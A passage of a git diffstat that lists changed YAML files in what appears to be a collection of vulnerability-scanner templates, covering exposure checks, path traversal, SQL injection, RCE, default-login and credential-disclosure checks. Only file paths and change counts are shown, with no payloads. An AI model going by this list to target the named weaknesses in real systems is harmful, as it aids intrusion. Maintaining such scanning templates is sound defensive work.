...authorized-puppet-node-manager-detect.yaml | 9 +- poc/detect/virtual-ema-detect-11024.yaml | 18 - poc/detect/virtual-ema-detect-11025.yaml | 18 + poc/detect/vmware-vrealize-detect-11058.yaml | 8 +- ...11057.yaml 
=> vmware-vrealize-detect.yaml} | 0 poc/detect/vnc-detect-11061.yaml | 6 +- poc/detect/voipmonitor-detect.yaml | 6 +- poc/detect/vsftpd-detection-11073.yaml | 17 - poc/detect/vsftpd-detection-11075.yaml | 31 + poc/detect/vsftpd-detection.yaml | 4 - poc/detect/waf-detect-11086.yaml | 662 - poc/detect/waf-detect-11087.yaml | 668 + poc/detect/wamp-xdebug-detect-11103.yaml | 21 +- poc/detect/wamp-xdebug-detect-11104.yaml | 16 + .../weave-scope-dashboard-detect-11118.yaml | 1 - poc/detect/web-ftp-detect-11136.yaml | 28 - poc/detect/web-ftp-detect-11137.yaml | 43 +- poc/detect/web-suite-detect-11168.yaml | 36 + poc/detect/web-suite-detect.yaml | 31 - poc/detect/weblogic-iiop-detect-11148.yaml | 4 - poc/detect/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 .../werkzeug-debugger-detect-11198.yaml | 5 +- poc/detect/whm-login-detect.yaml | 22 +- poc/detect/wondercms-detect-11222.yaml | 24 + poc/detect/wondercms-detect.yaml | 21 - ...11261.yaml => wordpress-detect-11260.yaml} | 0 poc/detect/wordpress-detect.yaml | 57 +- poc/detect/wordpress-gotmls-detect-11280.yaml | 30 - poc/detect/wordpress-gotmls-detect.yaml | 20 +- .../wordpress-plugins-detect-11298.yaml | 8 +- poc/detect/wordpress-plugins-detect.yaml | 30 +- poc/detect/wordpress-themes-detect.yaml | 22 +- poc/detect/worksites-detection-11384.yaml | 14 - poc/detect/worksites-detection-11385.yaml | 6 +- poc/detect/wowza-streaming-detect.yaml | 20 - poc/detect/wp-xmlrpc-pingback-detection.yaml | 11 +- poc/detect/wso2-apimanager-detect-11638.yaml | 19 - poc/detect/wuzhicms-detect-11653.yaml | 11 +- poc/detect/wuzhicms-detect-11654.yaml | 30 + poc/detect/wuzhicms-detect.yaml | 24 + poc/detect/yourls-detect.yaml | 48 + ...ct-11787.yaml => zentao-detect-11785.yaml} | 0 poc/detect/zentao-detect.yaml | 17 +- .../digitalrebar-traversal-6996.yaml | 16 +- .../digitalrebar-traversal-6997.yaml | 16 +- .../directory-traversal.yaml | 3 - ...ingframework-directory-traversal-7175.yaml | 32 - 
...y-springframework-directory-traversal.yaml | 21 + .../elfinder-path-traversal-7203.yaml | 37 - ...rsal.yaml => elfinder-path-traversal.yaml} | 0 .../erp-nc-directory-traversal-7245.yaml | 12 +- .../erp-nc-directory-traversal-7248.yaml | 6 +- .../finereport-path-traversal-7476.yaml | 22 +- .../finereport-path-traversal-7478.yaml | 17 +- .../kingdee-eas-directory-traversal-8489.yaml | 9 +- .../kingdee-eas-directory-traversal.yaml | 36 - ...yaml => natshell-path-traversal-9006.yaml} | 0 .../natshell-path-traversal-9008.yaml | 13 +- .../oa-tongda-path-traversal-9178.yaml | 33 - .../oa-tongda-path-traversal-9179.yaml | 34 - .../oa-tongda-path-traversal.yaml | 6 +- .../pmb-directory-traversal-9614.yaml | 25 +- .../pmb-directory-traversal.yaml | 22 + ... => tpshop-directory-traversal-10821.yaml} | 0 .../tpshop-directory-traversal.yaml | 27 + ....yaml => wooyun-path-traversal-11230.yaml} | 0 .../wooyun-path-traversal-11232.yaml | 27 - poc/docker/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/docker/amazon-docker-config.yaml | 18 + .../aws-ecs-container-agent-tasks-641.yaml | 25 - poc/docker/docker-compose-config-7059.yaml | 27 - poc/docker/docker-compose-config.yaml | 26 + poc/docker/docker-registry-7064.yaml | 4 +- poc/docker/docker-registry-7067.yaml | 20 +- poc/docker/docker-registry-7068.yaml | 20 - poc/docker/dockercfg-config-7056.yaml | 6 - poc/docker/dockercfg-config.yaml | 26 - .../dockerfile-hidden-disclosure-7061.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 31 - poc/docker/dockerfile-hidden-disclosure.yaml | 7 +- poc/docker/exposed-docker-api-7299.yaml | 12 +- .../kubernetes-enterprise-manager-8528.yaml | 21 + .../kubernetes-enterprise-manager-8529.yaml | 21 - poc/docker/kubernetes-enterprise-manager.yaml | 18 +- ...ernetes-kustomization-disclosure-8532.yaml | 3 +- .../kubernetes-kustomization-disclosure.yaml | 28 - poc/docker/kubernetes-metrics-8536.yaml 
| 7 +- poc/docker/kubernetes-metrics.yaml | 26 - poc/docker/kubernetes-pods-8542.yaml | 26 + poc/docker/kubernetes-pods-8543.yaml | 34 - .../kubernetes-resource-report-8547.yaml | 4 - ...-unauth.yaml => kubernetes-unauth(1).yaml} | 0 poc/docker/kubernetes-version-8551.yaml | 13 +- ...sion.yaml => kubernetes-version-8552.yaml} | 0 ...02.yaml => misconfigured-docker-8900.yaml} | 0 poc/docker/misconfigured-docker.yaml | 10 +- poc/drupal/drupal-install-7105.yaml | 19 - poc/drupal/drupal-install-7106.yaml | 11 +- poc/drupal/drupal-user-enum-ajax-7111.yaml | 40 - poc/drupal/drupal-user-enum-ajax.yaml | 13 +- .../drupal-user-enum-redirect-7115.yaml | 21 +- poc/elk/elasticsearch-7194.yaml | 20 +- .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/elk/exposed-kibana-7319.yaml | 17 +- poc/elk/exposed-kibana-7320.yaml | 14 +- ...tect-8484.yaml => kibana-detect-8483.yaml} | 0 poc/elk/kibana-panel-8485.yaml | 22 + poc/elk/kibana-panel-8486.yaml | 38 - poc/elk/kibana-panel.yaml | 43 +- poc/exposed/active-admin-exposure-41.yaml | 7 + poc/exposed/active-admin-exposure-42.yaml | 18 - poc/exposed/active-admin-exposure-43.yaml | 18 + .../adobe-connect-username-exposure-100.yaml | 27 - .../adobe-connect-username-exposure-101.yaml | 52 +- .../adobe-connect-username-exposure-98.yaml | 3 +- .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- .../ansible-config-disclosure-326.yaml | 28 + poc/exposed/ansible-config-disclosure.yaml | 16 - poc/exposed/ansible-tower-exposure.yaml | 13 +- poc/exposed/appspec-yml-disclosure-527.yaml | 20 +- poc/exposed/appspec-yml-disclosure-528.yaml | 3 +- poc/exposed/appspec-yml-disclosure-529.yaml | 28 + poc/exposed/avtech-dvr-exposure-614.yaml | 16 +- 
poc/exposed/avtech-dvr-exposure-617.yaml | 16 +- .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => axiom-digitalocean-key-exposure.yaml} | 0 .../beward-ipcamera-disclosure-715.yaml | 34 + .../beward-ipcamera-disclosure-716.yaml | 26 +- .../beward-ipcamera-disclosure-717.yaml | 8 +- ... => caucho-resin-info-disclosure-871.yaml} | 0 .../caucho-resin-info-disclosure-872.yaml | 15 +- poc/exposed/cisco-meraki-exposure-944.yaml | 25 + poc/exposed/cisco-meraki-exposure-946.yaml | 26 - poc/exposed/cisco-smi-exposure-970.yaml | 14 +- ...e-972.yaml => cisco-smi-exposure-971.yaml} | 0 .../clockwork-dashboard-exposure-1015.yaml | 31 + .../commax-credentials-disclosure-1158.yaml | 7 +- .../commax-credentials-disclosure-1160.yaml | 36 + poc/exposed/couchdb-exposure-1238.yaml | 25 - poc/exposed/couchdb-exposure-1239.yaml | 24 + poc/exposed/couchdb-exposure-1241.yaml | 6 +- poc/exposed/credential-exposure-1249.yaml | 7 +- poc/exposed/credentials-disclosure-1255.yaml | 4152 +- poc/exposed/credentials-disclosure-1256.yaml | 708 + poc/exposed/django-debug-exposed-404.yaml | 24 + poc/exposed/django-debug-exposure.yaml | 23 +- .../dockerfile-hidden-disclosure-7061.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 31 - poc/exposed/dockerfile-hidden-disclosure.yaml | 7 +- poc/exposed/druid-console-exposure-7092.yaml | 16 - poc/exposed/druid-console-exposure.yaml | 2 +- poc/exposed/exposed-adb-7280.yaml | 7 +- poc/exposed/exposed-adb-7281.yaml | 15 +- poc/exposed/exposed-adb-7282.yaml | 22 + poc/exposed/exposed-alps-spring-7283.yaml | 30 + poc/exposed/exposed-bitkeeper-7292.yaml | 28 + ...arcs-7298.yaml => exposed-darcs-7297.yaml} | 0 poc/exposed/exposed-docker-api-7299.yaml | 12 +- poc/exposed/exposed-docker-api-7301.yaml | 29 + poc/exposed/exposed-gitignore-7303.yaml | 40 - poc/exposed/exposed-gitignore-7306.yaml | 19 +- poc/exposed/exposed-glances-api-7308.yaml | 56 +- poc/exposed/exposed-hg-7312.yaml | 33 + .../exposed-jquery-file-upload-7313.yaml | 25 +- 
poc/exposed/exposed-jquery-file-upload.yaml | 22 - poc/exposed/exposed-kafdrop-7318.yaml | 19 + poc/exposed/exposed-kafdrop.yaml | 9 +- poc/exposed/exposed-kibana-7319.yaml | 17 +- poc/exposed/exposed-kibana-7320.yaml | 14 +- poc/exposed/exposed-mysql-initial-7323.yaml | 17 +- poc/exposed/exposed-mysql-initial-7324.yaml | 9 +- poc/exposed/exposed-nomad-7328.yaml | 31 - poc/exposed/exposed-nomad-7330.yaml | 30 - poc/exposed/exposed-nomad.yaml | 10 +- poc/exposed/exposed-redis-7339.yaml | 27 + poc/exposed/exposed-redis.yaml | 24 +- poc/exposed/exposed-service-now.yaml | 16 +- poc/exposed/exposed-sharepoint-list-7345.yaml | 28 - poc/exposed/exposed-sharepoint-list-7347.yaml | 8 +- poc/exposed/exposed-sqlite-manager-7349.yaml | 3 +- poc/exposed/exposed-sqlite-manager.yaml | 18 +- poc/exposed/exposed-svn-7351.yaml | 23 + poc/exposed/exposed-svn-7354.yaml | 27 +- poc/exposed/exposed-vscode-7357.yaml | 27 - poc/exposed/exposed-vscode.yaml | 18 + poc/exposed/exposed-webalizer-7358.yaml | 18 + poc/exposed/exposed-webalizer-7360.yaml | 18 - poc/exposed/exposed-zookeeper-7365.yaml | 18 - poc/exposed/exposed-zookeeper.yaml | 19 +- .../fanruanoa2012-disclosure-7389.yaml | 41 + poc/exposed/fanruanoa2012-disclosure.yaml | 31 - poc/exposed/firebase-config-exposure.yaml | 30 - poc/exposed/flink-exposure-7509.yaml | 17 - poc/exposed/flink-exposure-7511.yaml | 17 + poc/exposed/flink-exposure.yaml | 19 +- .../ftp-credentials-exposure-7568.yaml | 37 - poc/exposed/ftp-credentials-exposure.yaml | 22 + .../git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 .../github-workflows-disclosure-7664.yaml | 44 + .../github-workflows-disclosure-7665.yaml | 8 +- .../github-workflows-disclosure-7666.yaml | 51 - poc/exposed/github-workflows-disclosure.yaml | 10 +- .../glpi-telemetry-disclosure-7739.yaml | 25 - poc/exposed/glpi-telemetry-disclosure.yaml | 50 +- poc/exposed/gogs-install-exposure-7755.yaml | 21 + poc/exposed/hadoop-exposure-7874.yaml | 4 +- 
poc/exposed/hadoop-exposure.yaml | 20 +- .../hp-ilo-serial-key-disclosure-8023.yaml | 24 - .../hp-ilo-serial-key-disclosure-8025.yaml | 27 + poc/exposed/hp-ilo-serial-key-disclosure.yaml | 7 +- poc/exposed/ibm-friendly-path-exposure.yaml | 3 +- poc/exposed/iotawatt-app-exposure-8187.yaml | 21 +- poc/exposed/java-melody-exposed-8223.yaml | 6 +- .../jfrog-unauth-build-exposed-8299.yaml | 30 + .../jfrog-unauth-build-exposed-8302.yaml | 8 +- poc/exposed/jolokia-info-disclosure-8358.yaml | 73 - poc/exposed/jolokia-info-disclosure-8359.yaml | 71 + poc/exposed/jolokia-info-disclosure.yaml | 9 +- ...ernetes-kustomization-disclosure-8532.yaml | 3 +- .../kubernetes-kustomization-disclosure.yaml | 28 - poc/exposed/lvmeng-uts-disclosure-8680.yaml | 29 - poc/exposed/lvmeng-uts-disclosure.yaml | 8 +- poc/exposed/magento-2-exposed-api-8687.yaml | 5 +- poc/exposed/magento-2-exposed-api-8688.yaml | 45 + poc/exposed/magento-config-disclosure.yaml | 50 - poc/exposed/monitorix-exposure-8929.yaml | 23 +- poc/exposed/netgear-router-exposure-9031.yaml | 20 +- poc/exposed/netgear-router-exposure.yaml | 42 + poc/exposed/opcache-status-exposure-9254.yaml | 21 +- poc/exposed/opcache-status-exposure-9255.yaml | 19 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- poc/exposed/pgadmin-exposure-9490.yaml | 27 - poc/exposed/pgadmin-exposure-9491.yaml | 26 + poc/exposed/pgadmin-exposure.yaml | 15 +- poc/exposed/php-user-ini-disclosure-9561.yaml | 7 +- ...ml => pmb-local-file-disclosure-9619.yaml} | 0 poc/exposed/pmb-local-file-disclosure.yaml | 19 + .../prometheus-exposed-panel-9681.yaml | 14 - .../prometheus-exposed-panel-9683.yaml | 6 +- ...=> putty-private-key-disclosure-9730.yaml} | 0 poc/exposed/pyproject-disclosure-9736.yaml | 7 +- poc/exposed/pyproject-disclosure-9737.yaml | 22 - poc/exposed/pyproject-disclosure-9738.yaml | 26 + poc/exposed/qihang-media-disclosure-9764.yaml | 25 + poc/exposed/qihang-media-disclosure.yaml | 20 + 
.../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + .../rails-secret-token-disclosure.yaml | 3 +- ...aml => roundcube-log-disclosure-9907.yaml} | 0 poc/exposed/roundcube-log-disclosure.yaml | 45 +- .../ruijie-information-disclosure-9931.yaml | 21 + .../ruijie-information-disclosure-9932.yaml | 21 +- poc/exposed/selenium-exposure-10137.yaml | 32 + poc/exposed/selenium-exposure-10138.yaml | 30 - poc/exposed/selenium-exposure.yaml | 12 +- .../sensitive-storage-exposure-10143.yaml | 3 +- poc/exposed/sensitive-storage-exposure.yaml | 30 - poc/exposed/setup-page-exposure-10181.yaml | 19 - poc/exposed/setup-page-exposure.yaml | 3 - .../snyk-ignore-file-disclosure-10347.yaml | 21 + .../snyk-ignore-file-disclosure-10349.yaml | 24 - poc/exposed/snyk-ignore-file-disclosure.yaml | 7 +- poc/exposed/solr-exposure-10363.yaml | 12 +- poc/exposed/solr-exposure-10364.yaml | 24 + poc/exposed/solr-exposure-10366.yaml | 24 - ...kphp-509-information-disclosure-10755.yaml | 29 - .../thinkphp-509-information-disclosure.yaml | 14 +- poc/exposed/thumbs-db-disclosure-10761.yaml | 10 +- ...e.yaml => thumbs-db-disclosure-10763.yaml} | 0 .../tugboat-config-exposure-10842.yaml | 32 - ...aml => tugboat-config-exposure-10843.yaml} | 0 ...tchguard-credentials-disclosure-11107.yaml | 16 +- ...=> watchguard-credentials-disclosure.yaml} | 0 ...press-wpcourses-info-disclosure-11369.yaml | 34 + ...press-wpcourses-info-disclosure-11371.yaml | 36 - .../wordpress-wpcourses-info-disclosure.yaml | 13 +- .../wp-full-path-disclosure-11455.yaml | 16 + .../wp-full-path-disclosure-11457.yaml | 18 - poc/exposed/wp-full-path-disclosure.yaml | 9 +- .../wp-mailchimp-log-exposure-11494.yaml | 2 +- ....yaml => yarn-manager-exposure-11731.yaml} | 0 poc/exposed/yarn-manager-exposure.yaml | 14 +- .../zenphoto-installation-sensitive-info.yaml | 33 - .../zenphoto-sensitive-info-11784.yaml | 28 + poc/exposed/zenphoto-sensitive-info.yaml | 12 +- 
poc/extract/extract-urls-7368.yaml | 6 +- poc/extract/extract-urls-7370.yaml | 24 + poc/favicon/favicon-detection-7441.yaml | 2026 - poc/favicon/favicon-detection-7446.yaml | 97 +- poc/ftp/crush-ftp-detect-1271.yaml | 40 +- poc/ftp/crush-ftp-detect-1272.yaml | 21 + poc/ftp/crush-ftp-detect.yaml | 40 +- poc/ftp/crush-ftp-login-1273.yaml | 21 +- poc/ftp/crush-ftp-login-1275.yaml | 23 + poc/ftp/crush-ftp-login.yaml | 16 +- poc/ftp/crushftp-default-login.yaml | 59 + poc/ftp/ftp-credentials-exposure-7568.yaml | 37 - poc/ftp/ftp-credentials-exposure.yaml | 22 + poc/ftp/ftp-weak-credentials-7570.yaml | 43 - poc/ftp/ftp-weak-credentials.yaml | 23 +- .../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0 poc/ftp/ftpconfig-7566.yaml | 13 +- poc/ftp/unauth-ftp-10939.yaml | 13 +- poc/ftp/unauth-ftp-10942.yaml | 18 - poc/ftp/vsftpd-detection-11073.yaml | 17 - poc/ftp/vsftpd-detection-11075.yaml | 31 + poc/ftp/vsftpd-detection.yaml | 4 - poc/ftp/web-ftp-detect-11136.yaml | 28 - poc/ftp/web-ftp-detect-11137.yaml | 43 +- poc/ftp/wordpress-updraftplus-pem-key.yaml | 12 +- poc/fuzz/adminer-panel-fuzz.yaml | 3 +- ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/fuzz/lfi-linux-fuzz.yaml | 78 + poc/fuzz/linux-lfi-fuzz.yaml | 30 +- ...yaml => GCP-service-account (copy 1).yaml} | 0 poc/gcloud/gcp-service-account-11851.yaml | 16 + .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => axiom-digitalocean-key-exposure.yaml} | 0 poc/git/digitalrebar-traversal-6996.yaml | 16 +- poc/git/digitalrebar-traversal-6997.yaml | 16 +- poc/git/exposed-gitignore-7303.yaml | 40 - poc/git/exposed-gitignore-7306.yaml | 19 +- poc/git/git-config-7635.yaml | 14 + poc/git/git-config-7636.yaml | 19 +- ...l => git-config-nginxoffbyslash-7628.yaml} | 0 poc/git/git-config-nginxoffbyslash-7630.yaml | 35 + poc/git/git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 poc/git/git-mailmap.yaml | 8 +- poc/git/git-web-interface.yaml | 11 +- poc/git/gitbook-detect-7623.yaml | 
32 +- poc/git/gitbook-detect-7624.yaml | 5 +- poc/git/gitbook-takeover-7627.yaml | 22 + poc/git/gitbook-takeover.yaml | 16 +- poc/git/gitea-login.yaml | 13 +- poc/git/github-enterprise-detect-7649.yaml | 19 + poc/git/github-enterprise-detect-7650.yaml | 19 +- poc/git/github-gemfile-files-7653.yaml | 36 + poc/git/github-page-config-7654.yaml | 30 + poc/git/github-workflows-disclosure-7664.yaml | 44 + poc/git/github-workflows-disclosure-7665.yaml | 8 +- poc/git/github-workflows-disclosure-7666.yaml | 51 - poc/git/github-workflows-disclosure.yaml | 10 +- poc/git/gitlab-api-user-enum-7668.yaml | 7 +- poc/git/gitlab-api-user-enum.yaml | 16 +- poc/git/gitlab-public-repos.yaml | 29 - poc/git/gitlab-public-signup-7683.yaml | 26 - poc/git/gitlab-public-snippets-7688.yaml | 9 +- poc/git/gitlab-public-snippets-7690.yaml | 9 +- poc/git/gitlab-rce-7692.yaml | 21 +- poc/git/gitlab-rce-7693.yaml | 17 +- .../gitlab-uninitialized-password-7694.yaml | 11 +- .../gitlab-uninitialized-password-7695.yaml | 10 +- poc/git/gitlab-user-enumeration-7698.yaml | 46 +- poc/git/gitlab-weak-login-7707.yaml | 12 +- poc/git/gitlab-weak-login.yaml | 56 - poc/git/metadata-digitalocean.yaml | 12 +- poc/git/wordpress-git-config-11278.yaml | 26 - poc/git/wordpress-git-config-11279.yaml | 16 +- poc/google/api-google-drive-432.yaml | 28 + poc/google/api-google-drive.yaml | 23 - poc/google/google-api-key-7768.yaml | 9 +- poc/google/google-earth-dlogin-7781.yaml | 31 + poc/google/google-earth-dlogin.yaml | 17 +- poc/google/google-floc-disabled-7785.yaml | 6 +- .../google-secrets.yaml} | 0 poc/google/google-storage-7788.yaml | 16 + poc/google/google-storage-7789.yaml | 3 +- poc/google/metadata-google-8820.yaml | 13 +- poc/google/metadata-google-8821.yaml | 18 +- poc/graphql/graphql-alias-batching-7826.yaml | 32 +- poc/graphql/graphql-alias-batching.yaml | 37 - poc/graphql/graphql-array-batching-7827.yaml | 14 +- poc/graphql/graphql-array-batching.yaml | 43 + poc/graphql/graphql-detect-7830.yaml | 158 + 
poc/graphql/graphql-detect-7831.yaml | 158 - .../graphql-field-suggestion-7834.yaml | 13 +- poc/graphql/graphql-get-method-7835.yaml | 6 - poc/graphql/graphql-get-method.yaml | 34 - .../hasura-graphql-psql-exec-7899.yaml | 19 +- poc/graphql/hasura-graphql-ssrf-7905.yaml | 47 + poc/graphql/hasura-graphql-ssrf.yaml | 10 +- poc/header/header-command-injection-7918.yaml | 17 +- poc/header/header-command-injection-7919.yaml | 30 + poc/header/header_blind_xss-7914.yaml | 14 +- poc/header/host-header-injection-8000.yaml | 36 - poc/header/host-header-poisoning.yaml | 89 - poc/header/hostheaderpoisoning.yaml | 34 +- .../http-missing-security-headers-8058.yaml | 170 +- poc/header/http-missing-security-headers.yaml | 115 - poc/header/log4j-header.yaml | 55 + .../oob-header-based-interaction-9249.yaml | 7 +- .../oob-header-based-interaction-9250.yaml | 43 + poc/header/oob-header-based-interaction.yaml | 44 + poc/header/sqli_header-10504.yaml | 23 - poc/http/apache-httpd-rce-362.yaml | 41 - poc/http/apache-httpd-rce.yaml | 13 +- poc/http/cl-te-http-smuggling.yaml | 37 - poc/http/default-lighttpd-page-6866.yaml | 22 - poc/http/default-lighttpd-page-6867.yaml | 5 +- ...tp-etcd-unauthenticated-api-data-leak.yaml | 36 +- .../http-missing-security-headers-8058.yaml | 170 +- poc/http/http-missing-security-headers.yaml | 115 - .../http-value-share-template-2.yaml} | 0 poc/http/httpbin-open-redirect-8049.yaml | 27 +- poc/http/httpbin-open-redirect.yaml | 23 - poc/http/httpbin-panel-8051.yaml | 26 - poc/http/httpbin-panel.yaml | 19 +- poc/http/httpbin-xss-8052.yaml | 22 +- poc/http/httpd-config-8055.yaml | 34 + poc/http/httpd-config.yaml | 24 - poc/http/ibm-http-server-8095.yaml | 9 +- poc/http/ibm-http-server.yaml | 25 - poc/http/oracle-http-server-12c-9383.yaml | 4 +- poc/http/oracle-http-server-12c-9384.yaml | 19 + poc/http/oracle-httpserver12c.yaml | 9 +- poc/http/springboot-httptrace-10469.yaml | 25 +- .../ibm-advanced-system-management-8088.yaml | 23 + 
.../ibm-advanced-system-management-8090.yaml | 24 - poc/ibm/ibm-advanced-system-management.yaml | 12 +- poc/ibm/ibm-friendly-path-exposure.yaml | 3 +- poc/ibm/ibm-http-server-8095.yaml | 9 +- poc/ibm/ibm-http-server.yaml | 25 - ...gin-8110.yaml => ibm-note-login-8112.yaml} | 0 poc/ibm/ibm-security-access-manager-8113.yaml | 3 +- poc/ibm/ibm-service-assistant-8118.yaml | 24 - poc/ibm/ibm-service-assistant.yaml | 20 +- .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 19 +- .../buffalo-config-injection-798.yaml | 30 - .../buffalo-config-injection-800.yaml | 34 + .../buffalo-config-injection-801.yaml | 39 + poc/injection/buffalo-config-injection.yaml | 6 +- poc/injection/crlf-injection-1262.yaml | 29 + poc/injection/crlf-injection-1263.yaml | 6 +- poc/injection/crlf-injection-1264.yaml | 51 +- .../duomicms-sql-injection-7124.yaml | 27 + poc/injection/duomicms-sql-injection.yaml | 22 + ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/injection/glpi-9.3.3-sql-injection.yaml | 25 + .../header-command-injection-7918.yaml | 17 +- .../header-command-injection-7919.yaml | 30 + poc/injection/host-header-injection-8000.yaml | 36 - .../simple-crm-sql-injection-10275.yaml | 18 +- .../simple-crm-sql-injection-10277.yaml | 12 +- poc/injection/sql-injection.yaml | 94 +- poc/injection/weiphp-sql-injection-11190.yaml | 11 +- poc/java/default-jetty-page-6862.yaml | 17 + poc/java/default-jetty-page-6863.yaml | 3 +- ...ingframework-directory-traversal-7175.yaml | 32 - ...y-springframework-directory-traversal.yaml | 21 + poc/java/exposed-alps-spring-7283.yaml | 30 + poc/java/java-melody-exposed-8223.yaml | 6 +- poc/java/java-rmi-detect-8227.yaml | 17 + poc/java/java-rmi-detect.yaml | 17 +- poc/java/jboss-detect-8237.yaml | 34 + poc/java/jboss-detect.yaml | 22 - poc/java/jetty-showcontexts-enable-8297.yaml | 24 - poc/java/jinfornet-jreport-lfi-8307.yaml | 19 + 
poc/java/jinfornet-jreport-lfi-8308.yaml | 23 - poc/java/jinfornet-jreport-lfi.yaml | 6 +- poc/java/jsf-detection-8397.yaml | 19 - poc/java/jsf-detection-8398.yaml | 31 + poc/java/jsf-detection.yaml | 31 +- poc/java/public-tomcat-manager-9708.yaml | 21 - poc/java/public-tomcat-manager-9710.yaml | 11 +- poc/java/shiro-detect-10195.yaml | 11 +- poc/java/shiro-detect-10196.yaml | 19 - .../spring-framework-exceptions-10493.yaml | 28 - poc/java/spring-framework-exceptions.yaml | 24 + poc/java/springForShell-CVE-2022-22963.yaml | 36 + poc/java/springboot-actuator-10433.yaml | 24 +- poc/java/springboot-actuator-10435.yaml | 34 - ...pringboot-actuators-jolokia-xxe-10430.yaml | 28 + ...pringboot-actuators-jolokia-xxe-10431.yaml | 31 - poc/java/springboot-autoconfig.yaml | 25 - poc/java/springboot-beans-10441.yaml | 2 +- poc/java/springboot-configprops-10442.yaml | 42 + poc/java/springboot-env-10449.yaml | 13 +- poc/java/springboot-env-10450.yaml | 41 + poc/java/springboot-env-10451.yaml | 34 +- poc/java/springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 poc/java/springboot-health-10459.yaml | 38 + poc/java/springboot-health.yaml | 25 - poc/java/springboot-heapdump-10463.yaml | 29 - poc/java/springboot-httptrace-10469.yaml | 25 +- poc/java/springboot-info-10470.yaml | 9 +- poc/java/springboot-info.yaml | 31 + poc/java/springboot-loggers-10475.yaml | 13 +- poc/java/springboot-loggers-10476.yaml | 30 - poc/java/springboot-loggers-10477.yaml | 29 + poc/java/springboot-mappings-10478.yaml | 31 + poc/java/springboot-mappings-10481.yaml | 31 - poc/java/springboot-mappings.yaml | 4 +- poc/java/springboot-metrics-10483.yaml | 14 +- poc/java/springboot-threaddump-10484.yaml | 26 +- poc/java/springboot-threaddump-10486.yaml | 34 - poc/java/springboot-trace.yaml | 31 - poc/java/struts-debug-mode.yaml | 11 +- poc/java/struts-problem-report-10563.yaml | 20 - poc/java/struts-problem-report-10564.yaml | 19 + poc/java/struts-problem-report.yaml | 3 +- 
poc/java/tomcat-default-login-10791.yaml | 2 +- poc/java/tomcat-default-login.yaml | 76 + poc/java/tomcat-detect-10793.yaml | 4 +- poc/java/tomcat-detect.yaml | 21 +- poc/java/tomcat-pathnormalization.yaml | 28 - poc/java/tomcat-scripts-10803.yaml | 33 +- poc/java/weblogic-iiop-detect-11148.yaml | 4 - poc/java/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 poc/java/weblogic-weak-login-11154.yaml | 68 - poc/java/weblogic-weak-login-11155.yaml | 14 +- ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/java/webview-javascript.yaml | 11 +- ...el-11211.yaml => wildfly-panel-11209.yaml} | 0 poc/java/wildfly-panel.yaml | 16 +- .../aem-querybuilder-json-servlet-182.yaml | 72 +- poc/javascript/bower-json-769.yaml | 39 - poc/javascript/bower-json.yaml | 31 + poc/javascript/fastjson-1-2-24-rce-7400.yaml | 21 +- poc/javascript/fastjson-1-2-24-rce.yaml | 46 - poc/javascript/fastjson-1-2-41-rce-7403.yaml | 17 +- poc/javascript/fastjson-1-2-41-rce.yaml | 31 + poc/javascript/fastjson-1-2-42-rce-7407.yaml | 17 +- ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 poc/javascript/fastjson-1-2-43-rce-7411.yaml | 17 +- poc/javascript/fastjson-1-2-43-rce-7412.yaml | 44 + poc/javascript/fastjson-1-2-47-rce-7415.yaml | 19 +- poc/javascript/fastjson-1-2-47-rce-7416.yaml | 9 +- poc/javascript/fastjson-1-2-62-rce-7419.yaml | 43 + poc/javascript/fastjson-1-2-67-rce-7424.yaml | 17 +- poc/javascript/jsf-detection-8397.yaml | 19 - poc/javascript/jsf-detection-8398.yaml | 31 + poc/javascript/jsf-detection.yaml | 31 +- poc/javascript/jsherp-boot-panel.yaml | 31 - ...json-8472.yaml => keycloak-json-8473.yaml} | 0 poc/javascript/keycloak-json-8474.yaml | 5 +- poc/javascript/package-json-9421.yaml | 41 + poc/javascript/package-json.yaml | 26 - ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/javascript/webview-javascript.yaml | 11 +- 
